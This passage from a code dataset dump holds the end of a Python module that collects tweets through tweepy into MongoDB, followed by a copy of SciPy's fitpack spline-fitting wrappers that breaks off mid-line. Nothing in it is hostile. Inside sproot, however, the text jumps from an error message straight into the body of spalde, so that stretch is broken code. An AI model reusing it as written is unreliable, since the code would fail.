tweepy.Cursor\n Tweet cursor.\n Returns\n -------------\n mongodb compatible dictionnary made of posts that contained a source.\n \"\"\"\n posts={}\n # For refresh we have to map tweet.id and mongo_id\n # tweet.lang\n for tweet in tweet_cursor.items(tweet_count):\n if tweet.lang != 'und' and tweet.lang not in languages:\n continue\n if tweet.created_at < time_limit:\n break\n source_array=get_source_array(tweet)\n for source, source_id in zip(tweet.entities['urls'], source_array):\n posts[tweet.id_str + source_id]=get_tweet_json(tweet, source['expanded_url'])\n if len(tweet.entities['urls']) == 0 and not only_source:\n posts[tweet.id_str]=get_tweet_json(tweet, None)\n return posts\n\n\ndef get_user_cursor(user, api):\n \"\"\"\n Parameters\n -------------\n # 
user: str\n # twitter screen_name.\n # api: tweepy.api.API\n # object for twitter requests\n Returns\n -------------\n tweepy.Cursor object.\n \"\"\"\n return tweepy.Cursor(api.user_timeline, screen_name=user, include_rts=True)\n\ndef get_search_cursor(search, api):\n \"\"\"\n Parameters\n -------------\n # search: str\n # twitter search.\n # api: tweepy.api.API\n # object for twitter requests\n Returns\n -------------\n tweepy.Cursor object.\n \"\"\"\n return tweepy.Cursor(api.search, q=search, result_type=\"recent\", include_entities=True) \n\ndef get_list_members(user, slug, api):\n return list(tweepy.Cursor(api.list_members, user, slug).items())\n\n\ndef scrap_user(user, collection_id=None, curators=None, driver=None, count=0, time_limit='2006-03-20', only_source=True, languages=['en', 'fr']):\n user_url = get_user_url(user)\n if collection_id is None:\n collection_id, source_id = mongo.get_collection_source_id(user, curators, driver, user_url)\n\n time_limit = datetime.strptime(time_limit, '%Y-%m-%d')\n api=authenticate()\n posts=get_posts(get_user_cursor(user, api), int(count), time_limit, only_source, languages)\n mongo.store_collection(collection_id, source_id, posts, user, user_url)\n\ndef scrap_search(search, collection_id=None, driver=None, curators=None, count=0, time_limit='2006-03-20', only_source=True, languages=['en', 'fr']):\n search_url = get_search_url(search)\n if collection_id is None:\n collection_id, source_id = mongo.get_collection_source_id(search, curators, driver, search_url)\n\n time_limit = datetime.strptime(time_limit, '%Y-%m-%d')\n api=authenticate()\n posts=get_posts(get_search_cursor(search, api), int(count), time_limit, only_source, languages)\n mongo.store_collection(collection_id, source_id, posts, search, search_url)\n\ndef scrap_list(user, slug, collection_id=None, driver=None, curators=None, count=0, time_limit='2006-03-20', only_source=True, languages=['en', 'fr']):\n list_url = get_list_url(user, slug)\n if collection_id is None:\n collection_id, source_id = mongo.get_collection_source_id(slug, curators, driver, list_url)\n\n time_limit = datetime.strptime(time_limit, '%Y-%m-%d')\n api=authenticate()\n list_members=get_list_members(user, slug, api)\n for member in list_members:\n posts=get_posts(get_user_cursor(member.screen_name, api), int(count), time_limit, only_source, languages)\n mongo.store_collection(collection_id, source_id, posts, user, list_url)\n","sub_path":"intlekt_importation/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"495059859","text":"\"\"\"\nfitpack (dierckx in netlib) --- A Python-C wrapper to FITPACK (by P. Dierckx).\n FITPACK is a collection of FORTRAN programs for curve and surface\n fitting with splines and tensor product splines.\n\nSee\n https://web.archive.org/web/20010524124604/http://www.cs.kuleuven.ac.be:80/cwis/research/nalag/research/topics/fitpack.html\nor\n http://www.netlib.org/dierckx/\n\nCopyright 2002 Pearu Peterson all rights reserved,\nPearu Peterson \nPermission to use, modify, and distribute this software is given under the\nterms of the SciPy (BSD style) license. See LICENSE.txt that came with\nthis distribution for specifics.\n\nNO WARRANTY IS EXPRESSED OR IMPLIED. 
USE AT YOUR OWN RISK.\n\nTODO: Make interfaces to the following fitpack functions:\n For univariate splines: cocosp, concon, fourco, insert\n For bivariate splines: profil, regrid, parsur, surev\n\"\"\"\n\n__all__ = ['splrep', 'splprep', 'splev', 'splint', 'sproot', 'spalde',\n 'bisplrep', 'bisplev', 'insert', 'splder', 'splantider']\n\nimport warnings\nimport numpy as np\nfrom . import _fitpack\nfrom numpy import (atleast_1d, array, ones, zeros, sqrt, ravel, transpose,\n empty, iinfo, asarray)\n\n# Try to replace _fitpack interface with\n# f2py-generated version\nfrom . import dfitpack\n\n\ndfitpack_int = dfitpack.types.intvar.dtype\n\n\ndef _int_overflow(x, msg=None):\n \"\"\"Cast the value to an dfitpack_int and raise an OverflowError if the value\n cannot fit.\n \"\"\"\n if x > iinfo(dfitpack_int).max:\n if msg is None:\n msg = '%r cannot fit into an %r' % (x, dfitpack_int)\n raise OverflowError(msg)\n return dfitpack_int.type(x)\n\n\n_iermess = {\n 0: [\"The spline has a residual sum of squares fp such that \"\n \"abs(fp-s)/s<=0.001\", None],\n -1: [\"The spline is an interpolating spline (fp=0)\", None],\n -2: [\"The spline is weighted least-squares polynomial of degree k.\\n\"\n \"fp gives the upper bound fp0 for the smoothing factor s\", None],\n 1: [\"The required storage space exceeds the available storage space.\\n\"\n \"Probable causes: data (x,y) size is too small or smoothing parameter\"\n \"\\ns is too small (fp>s).\", ValueError],\n 2: [\"A theoretically impossible result when finding a smoothing spline\\n\"\n \"with fp = s. Probable cause: s too small. (abs(fp-s)/s>0.001)\",\n ValueError],\n 3: [\"The maximal number of iterations (20) allowed for finding smoothing\\n\"\n \"spline with fp=s has been reached. Probable cause: s too small.\\n\"\n \"(abs(fp-s)/s>0.001)\", ValueError],\n 10: [\"Error on input data\", ValueError],\n 'unknown': [\"An error occurred\", TypeError]\n}\n\n_iermess2 = {\n 0: [\"The spline has a residual sum of squares fp such that \"\n \"abs(fp-s)/s<=0.001\", None],\n -1: [\"The spline is an interpolating spline (fp=0)\", None],\n -2: [\"The spline is weighted least-squares polynomial of degree kx and ky.\"\n \"\\nfp gives the upper bound fp0 for the smoothing factor s\", None],\n -3: [\"Warning. The coefficients of the spline have been computed as the\\n\"\n \"minimal norm least-squares solution of a rank deficient system.\",\n None],\n 1: [\"The required storage space exceeds the available storage space.\\n\"\n \"Probable causes: nxest or nyest too small or s is too small. (fp>s)\",\n ValueError],\n 2: [\"A theoretically impossible result when finding a smoothing spline\\n\"\n \"with fp = s. Probable causes: s too small or badly chosen eps.\\n\"\n \"(abs(fp-s)/s>0.001)\", ValueError],\n 3: [\"The maximal number of iterations (20) allowed for finding smoothing\\n\"\n \"spline with fp=s has been reached. Probable cause: s too small.\\n\"\n \"(abs(fp-s)/s>0.001)\", ValueError],\n 4: [\"No more knots can be added because the number of B-spline\\n\"\n \"coefficients already exceeds the number of data points m.\\n\"\n \"Probable causes: either s or m too small. (fp>s)\", ValueError],\n 5: [\"No more knots can be added because the additional knot would\\n\"\n \"coincide with an old one. Probable cause: s too small or too large\\n\"\n \"a weight to an inaccurate data point. 
(fp>s)\", ValueError],\n 10: [\"Error on input data\", ValueError],\n 11: [\"rwrk2 too small, i.e., there is not enough workspace for computing\\n\"\n \"the minimal least-squares solution of a rank deficient system of\\n\"\n \"linear equations.\", ValueError],\n 'unknown': [\"An error occurred\", TypeError]\n}\n\n_parcur_cache = {'t': array([], float), 'wrk': array([], float),\n 'iwrk': array([], dfitpack_int), 'u': array([], float),\n 'ub': 0, 'ue': 1}\n\n\ndef splprep(x, w=None, u=None, ub=None, ue=None, k=3, task=0, s=None, t=None,\n full_output=0, nest=None, per=0, quiet=1):\n \"\"\"\n Find the B-spline representation of an N-D curve.\n\n Given a list of N rank-1 arrays, `x`, which represent a curve in\n N-dimensional space parametrized by `u`, find a smooth approximating\n spline curve g(`u`). Uses the FORTRAN routine parcur from FITPACK.\n\n Parameters\n ----------\n x : array_like\n A list of sample vector arrays representing the curve.\n w : array_like, optional\n Strictly positive rank-1 array of weights the same length as `x[0]`.\n The weights are used in computing the weighted least-squares spline\n fit. If the errors in the `x` values have standard-deviation given by\n the vector d, then `w` should be 1/d. Default is ``ones(len(x[0]))``.\n u : array_like, optional\n An array of parameter values. If not given, these values are\n calculated automatically as ``M = len(x[0])``, where\n\n v[0] = 0\n\n v[i] = v[i-1] + distance(`x[i]`, `x[i-1]`)\n\n u[i] = v[i] / v[M-1]\n\n ub, ue : int, optional\n The end-points of the parameters interval. Defaults to\n u[0] and u[-1].\n k : int, optional\n Degree of the spline. Cubic splines are recommended.\n Even values of `k` should be avoided especially with a small s-value.\n ``1 <= k <= 5``, default is 3.\n task : int, optional\n If task==0 (default), find t and c for a given smoothing factor, s.\n If task==1, find t and c for another value of the smoothing factor, s.\n There must have been a previous call with task=0 or task=1\n for the same set of data.\n If task=-1 find the weighted least square spline for a given set of\n knots, t.\n s : float, optional\n A smoothing condition. The amount of smoothness is determined by\n satisfying the conditions: ``sum((w * (y - g))**2,axis=0) <= s``,\n where g(x) is the smoothed interpolation of (x,y). The user can\n use `s` to control the trade-off between closeness and smoothness\n of fit. Larger `s` means more smoothing while smaller values of `s`\n indicate less smoothing. Recommended values of `s` depend on the\n weights, w. If the weights represent the inverse of the\n standard-deviation of y, then a good `s` value should be found in\n the range ``(m-sqrt(2*m),m+sqrt(2*m))``, where m is the number of\n data points in x, y, and w.\n t : int, optional\n The knots needed for task=-1.\n full_output : int, optional\n If non-zero, then return optional outputs.\n nest : int, optional\n An over-estimate of the total number of knots of the spline to\n help in determining the storage space. By default nest=m/2.\n Always large enough is nest=m+k+1.\n per : int, optional\n If non-zero, data points are considered periodic with period\n ``x[m-1] - x[0]`` and a smooth periodic spline approximation is\n returned. 
Values of ``y[m-1]`` and ``w[m-1]`` are not used.\n quiet : int, optional\n Non-zero to suppress messages.\n This parameter is deprecated; use standard Python warning filters\n instead.\n\n Returns\n -------\n tck : tuple\n A tuple (t,c,k) containing the vector of knots, the B-spline\n coefficients, and the degree of the spline.\n u : array\n An array of the values of the parameter.\n fp : float\n The weighted sum of squared residuals of the spline approximation.\n ier : int\n An integer flag about splrep success. Success is indicated\n if ier<=0. If ier in [1,2,3] an error occurred but was not raised.\n Otherwise an error is raised.\n msg : str\n A message corresponding to the integer flag, ier.\n\n See Also\n --------\n splrep, splev, sproot, spalde, splint,\n bisplrep, bisplev\n UnivariateSpline, BivariateSpline\n\n Notes\n -----\n See `splev` for evaluation of the spline and its derivatives.\n The number of dimensions N must be smaller than 11.\n\n References\n ----------\n .. [1] P. Dierckx, \"Algorithms for smoothing data with periodic and\n parametric splines, Computer Graphics and Image Processing\",\n 20 (1982) 171-184.\n .. [2] P. Dierckx, \"Algorithms for smoothing data with periodic and\n parametric splines\", report tw55, Dept. Computer Science,\n K.U.Leuven, 1981.\n .. [3] P. Dierckx, \"Curve and surface fitting with splines\", Monographs on\n Numerical Analysis, Oxford University Press, 1993.\n\n \"\"\"\n if task <= 0:\n _parcur_cache = {'t': array([], float), 'wrk': array([], float),\n 'iwrk': array([], dfitpack_int), 'u': array([], float),\n 'ub': 0, 'ue': 1}\n x = atleast_1d(x)\n idim, m = x.shape\n if per:\n for i in range(idim):\n if x[i][0] != x[i][-1]:\n if quiet < 2:\n warnings.warn(RuntimeWarning('Setting x[%d][%d]=x[%d][0]' %\n (i, m, i)))\n x[i][-1] = x[i][0]\n if not 0 < idim < 11:\n raise TypeError('0 < idim < 11 must hold')\n if w is None:\n w = ones(m, float)\n else:\n w = atleast_1d(w)\n ipar = (u is not None)\n if ipar:\n _parcur_cache['u'] = u\n if ub is None:\n _parcur_cache['ub'] = u[0]\n else:\n _parcur_cache['ub'] = ub\n if ue is None:\n _parcur_cache['ue'] = u[-1]\n else:\n _parcur_cache['ue'] = ue\n else:\n _parcur_cache['u'] = zeros(m, float)\n if not (1 <= k <= 5):\n raise TypeError('1 <= k= %d <=5 must hold' % k)\n if not (-1 <= task <= 1):\n raise TypeError('task must be -1, 0 or 1')\n if (not len(w) == m) or (ipar == 1 and (not len(u) == m)):\n raise TypeError('Mismatch of input dimensions')\n if s is None:\n s = m - sqrt(2*m)\n if t is None and task == -1:\n raise TypeError('Knots must be given for task=-1')\n if t is not None:\n _parcur_cache['t'] = atleast_1d(t)\n n = len(_parcur_cache['t'])\n if task == -1 and n < 2*k + 2:\n raise TypeError('There must be at least 2*k+2 knots for task=-1')\n if m <= k:\n raise TypeError('m > k must hold')\n if nest is None:\n nest = m + 2*k\n\n if (task >= 0 and s == 0) or (nest < 0):\n if per:\n nest = m + 2*k\n else:\n nest = m + k + 1\n nest = max(nest, 2*k + 3)\n u = _parcur_cache['u']\n ub = _parcur_cache['ub']\n ue = _parcur_cache['ue']\n t = _parcur_cache['t']\n wrk = _parcur_cache['wrk']\n iwrk = _parcur_cache['iwrk']\n t, c, o = _fitpack._parcur(ravel(transpose(x)), w, u, ub, ue, k,\n task, ipar, s, t, nest, wrk, iwrk, per)\n _parcur_cache['u'] = o['u']\n _parcur_cache['ub'] = o['ub']\n _parcur_cache['ue'] = o['ue']\n _parcur_cache['t'] = t\n _parcur_cache['wrk'] = o['wrk']\n _parcur_cache['iwrk'] = o['iwrk']\n ier = o['ier']\n fp = o['fp']\n n = len(t)\n u = o['u']\n c.shape = idim, n - k - 1\n tcku 
= [t, list(c), k], u\n    if ier <= 0 and not quiet:\n        warnings.warn(RuntimeWarning(_iermess[ier][0] +\n                                     \"\\tk=%d n=%d m=%d fp=%f s=%f\" %\n                                     (k, len(t), m, fp, s)))\n    if ier > 0 and not full_output:\n        if ier in [1, 2, 3]:\n            warnings.warn(RuntimeWarning(_iermess[ier][0]))\n        else:\n            try:\n                raise _iermess[ier][1](_iermess[ier][0])\n            except KeyError as e:\n                raise _iermess['unknown'][1](_iermess['unknown'][0]) from e\n    if full_output:\n        try:\n            return tcku, fp, ier, _iermess[ier][0]\n        except KeyError:\n            return tcku, fp, ier, _iermess['unknown'][0]\n    else:\n        return tcku\n\n\n_curfit_cache = {'t': array([], float), 'wrk': array([], float),\n                 'iwrk': array([], dfitpack_int)}\n\n\ndef splrep(x, y, w=None, xb=None, xe=None, k=3, task=0, s=None, t=None,\n           full_output=0, per=0, quiet=1):\n    \"\"\"\n    Find the B-spline representation of a 1-D curve.\n\n    Given the set of data points ``(x[i], y[i])`` determine a smooth spline\n    approximation of degree k on the interval ``xb <= x <= xe``.\n\n    Parameters\n    ----------\n    x, y : array_like\n        The data points defining a curve y = f(x).\n    w : array_like, optional\n        Strictly positive rank-1 array of weights the same length as x and y.\n        The weights are used in computing the weighted least-squares spline\n        fit. If the errors in the y values have standard-deviation given by the\n        vector d, then w should be 1/d. Default is ones(len(x)).\n    xb, xe : float, optional\n        The interval to fit.  If None, these default to x[0] and x[-1]\n        respectively.\n    k : int, optional\n        The order of the spline fit. It is recommended to use cubic splines.\n        Even order splines should be avoided especially with small s values.\n        1 <= k <= 5\n    task : {1, 0, -1}, optional\n        If task==0 find t and c for a given smoothing factor, s.\n\n        If task==1 find t and c for another value of the smoothing factor, s.\n        There must have been a previous call with task=0 or task=1 for the same\n        set of data (t will be stored and used internally)\n\n        If task=-1 find the weighted least square spline for a given set of\n        knots, t. These should be interior knots as knots on the ends will be\n        added automatically.\n    s : float, optional\n        A smoothing condition. The amount of smoothness is determined by\n        satisfying the conditions: sum((w * (y - g))**2,axis=0) <= s, where g(x)\n        is the smoothed interpolation of (x,y). The user can use s to control\n        the tradeoff between closeness and smoothness of fit. Larger s means\n        more smoothing while smaller values of s indicate less smoothing.\n        Recommended values of s depend on the weights, w. If the weights\n        represent the inverse of the standard-deviation of y, then a good s\n        value should be found in the range (m-sqrt(2*m),m+sqrt(2*m)) where m is\n        the number of datapoints in x, y, and w. default : s=m-sqrt(2*m) if\n        weights are supplied. s = 0.0 (interpolating) if no weights are\n        supplied.\n    t : array_like, optional\n        The knots needed for task=-1. If given then task is automatically set\n        to -1.\n    full_output : bool, optional\n        If non-zero, then return optional outputs.\n    per : bool, optional\n        If non-zero, data points are considered periodic with period x[m-1] -\n        x[0] and a smooth periodic spline approximation is returned. 
Values of\n y[m-1] and w[m-1] are not used.\n quiet : bool, optional\n Non-zero to suppress messages.\n This parameter is deprecated; use standard Python warning filters\n instead.\n\n Returns\n -------\n tck : tuple\n (t,c,k) a tuple containing the vector of knots, the B-spline\n coefficients, and the degree of the spline.\n fp : array, optional\n The weighted sum of squared residuals of the spline approximation.\n ier : int, optional\n An integer flag about splrep success. Success is indicated if ier<=0.\n If ier in [1,2,3] an error occurred but was not raised. Otherwise an\n error is raised.\n msg : str, optional\n A message corresponding to the integer flag, ier.\n\n See Also\n --------\n UnivariateSpline, BivariateSpline\n splprep, splev, sproot, spalde, splint\n bisplrep, bisplev\n\n Notes\n -----\n See splev for evaluation of the spline and its derivatives. Uses the\n FORTRAN routine curfit from FITPACK.\n\n The user is responsible for assuring that the values of *x* are unique.\n Otherwise, *splrep* will not return sensible results.\n\n If provided, knots `t` must satisfy the Schoenberg-Whitney conditions,\n i.e., there must be a subset of data points ``x[j]`` such that\n ``t[j] < x[j] < t[j+k+1]``, for ``j=0, 1,...,n-k-2``.\n\n References\n ----------\n Based on algorithms described in [1]_, [2]_, [3]_, and [4]_:\n\n .. [1] P. Dierckx, \"An algorithm for smoothing, differentiation and\n integration of experimental data using spline functions\",\n J.Comp.Appl.Maths 1 (1975) 165-184.\n .. [2] P. Dierckx, \"A fast algorithm for smoothing data on a rectangular\n grid while using spline functions\", SIAM J.Numer.Anal. 19 (1982)\n 1286-1304.\n .. [3] P. Dierckx, \"An improved algorithm for curve fitting with spline\n functions\", report tw54, Dept. Computer Science,K.U. Leuven, 1981.\n .. [4] P. Dierckx, \"Curve and surface fitting with splines\", Monographs on\n Numerical Analysis, Oxford University Press, 1993.\n\n Examples\n --------\n\n >>> import matplotlib.pyplot as plt\n >>> from scipy.interpolate import splev, splrep\n >>> x = np.linspace(0, 10, 10)\n >>> y = np.sin(x)\n >>> tck = splrep(x, y)\n >>> x2 = np.linspace(0, 10, 200)\n >>> y2 = splev(x2, tck)\n >>> plt.plot(x, y, 'o', x2, y2)\n >>> plt.show()\n\n \"\"\"\n if task <= 0:\n _curfit_cache = {}\n x, y = map(atleast_1d, [x, y])\n m = len(x)\n if w is None:\n w = ones(m, float)\n if s is None:\n s = 0.0\n else:\n w = atleast_1d(w)\n if s is None:\n s = m - sqrt(2*m)\n if not len(w) == m:\n raise TypeError('len(w)=%d is not equal to m=%d' % (len(w), m))\n if (m != len(y)) or (m != len(w)):\n raise TypeError('Lengths of the first three arguments (x,y,w) must '\n 'be equal')\n if not (1 <= k <= 5):\n raise TypeError('Given degree of the spline (k=%d) is not supported. 
'\n '(1<=k<=5)' % k)\n if m <= k:\n raise TypeError('m > k must hold')\n if xb is None:\n xb = x[0]\n if xe is None:\n xe = x[-1]\n if not (-1 <= task <= 1):\n raise TypeError('task must be -1, 0 or 1')\n if t is not None:\n task = -1\n if task == -1:\n if t is None:\n raise TypeError('Knots must be given for task=-1')\n numknots = len(t)\n _curfit_cache['t'] = empty((numknots + 2*k + 2,), float)\n _curfit_cache['t'][k+1:-k-1] = t\n nest = len(_curfit_cache['t'])\n elif task == 0:\n if per:\n nest = max(m + 2*k, 2*k + 3)\n else:\n nest = max(m + k + 1, 2*k + 3)\n t = empty((nest,), float)\n _curfit_cache['t'] = t\n if task <= 0:\n if per:\n _curfit_cache['wrk'] = empty((m*(k + 1) + nest*(8 + 5*k),), float)\n else:\n _curfit_cache['wrk'] = empty((m*(k + 1) + nest*(7 + 3*k),), float)\n _curfit_cache['iwrk'] = empty((nest,), dfitpack_int)\n try:\n t = _curfit_cache['t']\n wrk = _curfit_cache['wrk']\n iwrk = _curfit_cache['iwrk']\n except KeyError as e:\n raise TypeError(\"must call with task=1 only after\"\n \" call with task=0,-1\") from e\n if not per:\n n, c, fp, ier = dfitpack.curfit(task, x, y, w, t, wrk, iwrk,\n xb, xe, k, s)\n else:\n n, c, fp, ier = dfitpack.percur(task, x, y, w, t, wrk, iwrk, k, s)\n tck = (t[:n], c[:n], k)\n if ier <= 0 and not quiet:\n _mess = (_iermess[ier][0] + \"\\tk=%d n=%d m=%d fp=%f s=%f\" %\n (k, len(t), m, fp, s))\n warnings.warn(RuntimeWarning(_mess))\n if ier > 0 and not full_output:\n if ier in [1, 2, 3]:\n warnings.warn(RuntimeWarning(_iermess[ier][0]))\n else:\n try:\n raise _iermess[ier][1](_iermess[ier][0])\n except KeyError as e:\n raise _iermess['unknown'][1](_iermess['unknown'][0]) from e\n if full_output:\n try:\n return tck, fp, ier, _iermess[ier][0]\n except KeyError:\n return tck, fp, ier, _iermess['unknown'][0]\n else:\n return tck\n\n\ndef splev(x, tck, der=0, ext=0):\n \"\"\"\n Evaluate a B-spline or its derivatives.\n\n Given the knots and coefficients of a B-spline representation, evaluate\n the value of the smoothing polynomial and its derivatives. This is a\n wrapper around the FORTRAN routines splev and splder of FITPACK.\n\n Parameters\n ----------\n x : array_like\n An array of points at which to return the value of the smoothed\n spline or its derivatives. If `tck` was returned from `splprep`,\n then the parameter values, u should be given.\n tck : tuple\n A sequence of length 3 returned by `splrep` or `splprep` containing\n the knots, coefficients, and degree of the spline.\n der : int, optional\n The order of derivative of the spline to compute (must be less than\n or equal to k).\n ext : int, optional\n Controls the value returned for elements of ``x`` not in the\n interval defined by the knot sequence.\n\n * if ext=0, return the extrapolated value.\n * if ext=1, return 0\n * if ext=2, raise a ValueError\n * if ext=3, return the boundary value.\n\n The default value is 0.\n\n Returns\n -------\n y : ndarray or list of ndarrays\n An array of values representing the spline function evaluated at\n the points in ``x``. If `tck` was returned from `splprep`, then this\n is a list of arrays representing the curve in N-D space.\n\n See Also\n --------\n splprep, splrep, sproot, spalde, splint\n bisplrep, bisplev\n\n References\n ----------\n .. [1] C. de Boor, \"On calculating with b-splines\", J. Approximation\n Theory, 6, p.50-62, 1972.\n .. [2] M.G. Cox, \"The numerical evaluation of b-splines\", J. Inst. Maths\n Applics, 10, p.134-149, 1972.\n .. [3] P. 
Dierckx, \"Curve and surface fitting with splines\", Monographs\n on Numerical Analysis, Oxford University Press, 1993.\n\n \"\"\"\n t, c, k = tck\n try:\n c[0][0]\n parametric = True\n except Exception:\n parametric = False\n if parametric:\n return list(map(lambda c, x=x, t=t, k=k, der=der:\n splev(x, [t, c, k], der, ext), c))\n else:\n if not (0 <= der <= k):\n raise ValueError(\"0<=der=%d<=k=%d must hold\" % (der, k))\n if ext not in (0, 1, 2, 3):\n raise ValueError(\"ext = %s not in (0, 1, 2, 3) \" % ext)\n\n x = asarray(x)\n shape = x.shape\n x = atleast_1d(x).ravel()\n y, ier = _fitpack._spl_(x, der, t, c, k, ext)\n\n if ier == 10:\n raise ValueError(\"Invalid input data\")\n if ier == 1:\n raise ValueError(\"Found x value not in the domain\")\n if ier:\n raise TypeError(\"An error occurred\")\n\n return y.reshape(shape)\n\n\ndef splint(a, b, tck, full_output=0):\n \"\"\"\n Evaluate the definite integral of a B-spline.\n\n Given the knots and coefficients of a B-spline, evaluate the definite\n integral of the smoothing polynomial between two given points.\n\n Parameters\n ----------\n a, b : float\n The end-points of the integration interval.\n tck : tuple\n A tuple (t,c,k) containing the vector of knots, the B-spline\n coefficients, and the degree of the spline (see `splev`).\n full_output : int, optional\n Non-zero to return optional output.\n\n Returns\n -------\n integral : float\n The resulting integral.\n wrk : ndarray\n An array containing the integrals of the normalized B-splines\n defined on the set of knots.\n\n Notes\n -----\n splint silently assumes that the spline function is zero outside the data\n interval (a, b).\n\n See Also\n --------\n splprep, splrep, sproot, spalde, splev\n bisplrep, bisplev\n UnivariateSpline, BivariateSpline\n\n References\n ----------\n .. [1] P.W. Gaffney, The calculation of indefinite integrals of b-splines\",\n J. Inst. Maths Applics, 17, p.37-41, 1976.\n .. [2] P. Dierckx, \"Curve and surface fitting with splines\", Monographs\n on Numerical Analysis, Oxford University Press, 1993.\n\n \"\"\"\n t, c, k = tck\n try:\n c[0][0]\n parametric = True\n except Exception:\n parametric = False\n if parametric:\n return list(map(lambda c, a=a, b=b, t=t, k=k:\n splint(a, b, [t, c, k]), c))\n else:\n aint, wrk = _fitpack._splint(t, c, k, a, b)\n if full_output:\n return aint, wrk\n else:\n return aint\n\n\ndef sproot(tck, mest=10):\n \"\"\"\n Find the roots of a cubic B-spline.\n\n Given the knots (>=8) and coefficients of a cubic B-spline return the\n roots of the spline.\n\n Parameters\n ----------\n tck : tuple\n A tuple (t,c,k) containing the vector of knots,\n the B-spline coefficients, and the degree of the spline.\n The number of knots must be >= 8, and the degree must be 3.\n The knots must be a montonically increasing sequence.\n mest : int, optional\n An estimate of the number of zeros (Default is 10).\n\n Returns\n -------\n zeros : ndarray\n An array giving the roots of the spline.\n\n See also\n --------\n splprep, splrep, splint, spalde, splev\n bisplrep, bisplev\n UnivariateSpline, BivariateSpline\n\n\n References\n ----------\n .. [1] C. de Boor, \"On calculating with b-splines\", J. Approximation\n Theory, 6, p.50-62, 1972.\n .. [2] M.G. Cox, \"The numerical evaluation of b-splines\", J. Inst. Maths\n Applics, 10, p.134-149, 1972.\n .. [3] P. 
Dierckx, \"Curve and surface fitting with splines\", Monographs\n on Numerical Analysis, Oxford University Press, 1993.\n\n \"\"\"\n t, c, k = tck\n if k != 3:\n raise ValueError(\"sproot works only for cubic (k=3) splines\")\n try:\n c[0][0]\n parametric = True\n except Exception:\n parametric = False\n if parametric:\n return list(map(lambda c, t=t, k=k, mest=mest:\n sproot([t, c, k], mest), c))\n else:\n if len(t) < 8:\n raise TypeError(\"The number of knots %d>=8\" % len(t))\n z, ier = _fitpack._sproot(t, c, k, mest)\n if ier == 10:\n raise TypeError(\"Invalid input data. \"\n \"t1<=..<=t4 1:\n return list(map(lambda x, tck=tck: spalde(x, tck), x))\n d, ier = _fitpack._spalde(t, c, k, x[0])\n if ier == 0:\n return d\n if ier == 10:\n raise TypeError(\"Invalid input data. t(k)<=x<=t(n-k+1) must hold.\")\n raise TypeError(\"Unknown error\")\n\n# def _curfit(x,y,w=None,xb=None,xe=None,k=3,task=0,s=None,t=None,\n# full_output=0,nest=None,per=0,quiet=1):\n\n\n_surfit_cache = {'tx': array([], float), 'ty': array([], float),\n 'wrk': array([], float), 'iwrk': array([], dfitpack_int)}\n\n\ndef bisplrep(x, y, z, w=None, xb=None, xe=None, yb=None, ye=None,\n kx=3, ky=3, task=0, s=None, eps=1e-16, tx=None, ty=None,\n full_output=0, nxest=None, nyest=None, quiet=1):\n \"\"\"\n Find a bivariate B-spline representation of a surface.\n\n Given a set of data points (x[i], y[i], z[i]) representing a surface\n z=f(x,y), compute a B-spline representation of the surface. Based on\n the routine SURFIT from FITPACK.\n\n Parameters\n ----------\n x, y, z : ndarray\n Rank-1 arrays of data points.\n w : ndarray, optional\n Rank-1 array of weights. By default ``w=np.ones(len(x))``.\n xb, xe : float, optional\n End points of approximation interval in `x`.\n By default ``xb = x.min(), xe=x.max()``.\n yb, ye : float, optional\n End points of approximation interval in `y`.\n By default ``yb=y.min(), ye = y.max()``.\n kx, ky : int, optional\n The degrees of the spline (1 <= kx, ky <= 5).\n Third order (kx=ky=3) is recommended.\n task : int, optional\n If task=0, find knots in x and y and coefficients for a given\n smoothing factor, s.\n If task=1, find knots and coefficients for another value of the\n smoothing factor, s. bisplrep must have been previously called\n with task=0 or task=1.\n If task=-1, find coefficients for a given set of knots tx, ty.\n s : float, optional\n A non-negative smoothing factor. If weights correspond\n to the inverse of the standard-deviation of the errors in z,\n then a good s-value should be found in the range\n ``(m-sqrt(2*m),m+sqrt(2*m))`` where m=len(x).\n eps : float, optional\n A threshold for determining the effective rank of an\n over-determined linear system of equations (0 < eps < 1).\n `eps` is not likely to need changing.\n tx, ty : ndarray, optional\n Rank-1 arrays of the knots of the spline for task=-1\n full_output : int, optional\n Non-zero to return optional outputs.\n nxest, nyest : int, optional\n Over-estimates of the total number of knots. 
If None then\n ``nxest = max(kx+sqrt(m/2),2*kx+3)``,\n ``nyest = max(ky+sqrt(m/2),2*ky+3)``.\n quiet : int, optional\n Non-zero to suppress printing of messages.\n This parameter is deprecated; use standard Python warning filters\n instead.\n\n Returns\n -------\n tck : array_like\n A list [tx, ty, c, kx, ky] containing the knots (tx, ty) and\n coefficients (c) of the bivariate B-spline representation of the\n surface along with the degree of the spline.\n fp : ndarray\n The weighted sum of squared residuals of the spline approximation.\n ier : int\n An integer flag about splrep success. Success is indicated if\n ier<=0. If ier in [1,2,3] an error occurred but was not raised.\n Otherwise an error is raised.\n msg : str\n A message corresponding to the integer flag, ier.\n\n See Also\n --------\n splprep, splrep, splint, sproot, splev\n UnivariateSpline, BivariateSpline\n\n Notes\n -----\n See `bisplev` to evaluate the value of the B-spline given its tck\n representation.\n\n References\n ----------\n .. [1] Dierckx P.:An algorithm for surface fitting with spline functions\n Ima J. Numer. Anal. 1 (1981) 267-283.\n .. [2] Dierckx P.:An algorithm for surface fitting with spline functions\n report tw50, Dept. Computer Science,K.U.Leuven, 1980.\n .. [3] Dierckx P.:Curve and surface fitting with splines, Monographs on\n Numerical Analysis, Oxford University Press, 1993.\n\n Examples\n --------\n Examples are given :ref:`in the tutorial `.\n\n \"\"\"\n x, y, z = map(ravel, [x, y, z]) # ensure 1-d arrays.\n m = len(x)\n if not (m == len(y) == len(z)):\n raise TypeError('len(x)==len(y)==len(z) must hold.')\n if w is None:\n w = ones(m, float)\n else:\n w = atleast_1d(w)\n if not len(w) == m:\n raise TypeError('len(w)=%d is not equal to m=%d' % (len(w), m))\n if xb is None:\n xb = x.min()\n if xe is None:\n xe = x.max()\n if yb is None:\n yb = y.min()\n if ye is None:\n ye = y.max()\n if not (-1 <= task <= 1):\n raise TypeError('task must be -1, 0 or 1')\n if s is None:\n s = m - sqrt(2*m)\n if tx is None and task == -1:\n raise TypeError('Knots_x must be given for task=-1')\n if tx is not None:\n _surfit_cache['tx'] = atleast_1d(tx)\n nx = len(_surfit_cache['tx'])\n if ty is None and task == -1:\n raise TypeError('Knots_y must be given for task=-1')\n if ty is not None:\n _surfit_cache['ty'] = 